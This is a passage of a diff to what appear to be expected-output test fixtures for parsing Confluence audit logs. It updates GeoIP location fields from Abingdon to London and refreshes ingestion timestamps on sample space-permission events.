"location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1614,7 +1512,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222403276Z", + "ingested": "2021-12-14T14:34:31.513206104Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.877Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1699,20 +1597,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1720,7 +1612,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222405166Z", + "ingested": "2021-12-14T14:34:31.513206620Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.872Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1805,20 +1697,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1826,7 +1712,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222407055Z", + "ingested": "2021-12-14T14:34:31.513207050Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.868Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -1911,20 +1797,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -1932,7 +1812,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222408976Z", + "ingested": "2021-12-14T14:34:31.513207539Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.862Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2010,20 +1890,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2031,7 +1905,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222410888Z", + "ingested": "2021-12-14T14:34:31.513208009Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.858Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2116,20 +1990,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2137,7 +2005,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222412778Z", + "ingested": "2021-12-14T14:34:31.513208509Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.853Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2222,20 +2090,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2243,7 +2105,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222414716Z", + "ingested": "2021-12-14T14:34:31.513208910Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.848Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2328,20 +2190,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2349,7 +2205,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222416708Z", + "ingested": "2021-12-14T14:34:31.513209516Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.841Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2427,20 +2283,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2448,7 +2298,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222418620Z", + "ingested": "2021-12-14T14:34:31.513210024Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.832Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2533,20 +2383,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2554,7 +2398,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222420509Z", + "ingested": "2021-12-14T14:34:31.513210417Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.821Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2639,20 +2483,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2660,7 +2498,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222422409Z", + "ingested": "2021-12-14T14:34:31.513210868Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.811Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2745,20 +2583,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2766,7 +2598,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222424328Z", + "ingested": "2021-12-14T14:34:31.513211280Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.796Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2844,20 +2676,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2865,7 +2691,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222426219Z", + "ingested": "2021-12-14T14:34:31.513211683Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.785Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2950,20 +2776,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -2971,7 +2791,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222428101Z", + "ingested": "2021-12-14T14:34:31.513212078Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.777Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3056,20 +2876,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3077,7 +2891,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222430092Z", + "ingested": "2021-12-14T14:34:31.513212814Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.770Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3162,20 +2976,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -3183,7 +2991,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222431970Z", + "ingested": "2021-12-14T14:34:31.513213264Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.756Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3261,20 +3069,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - 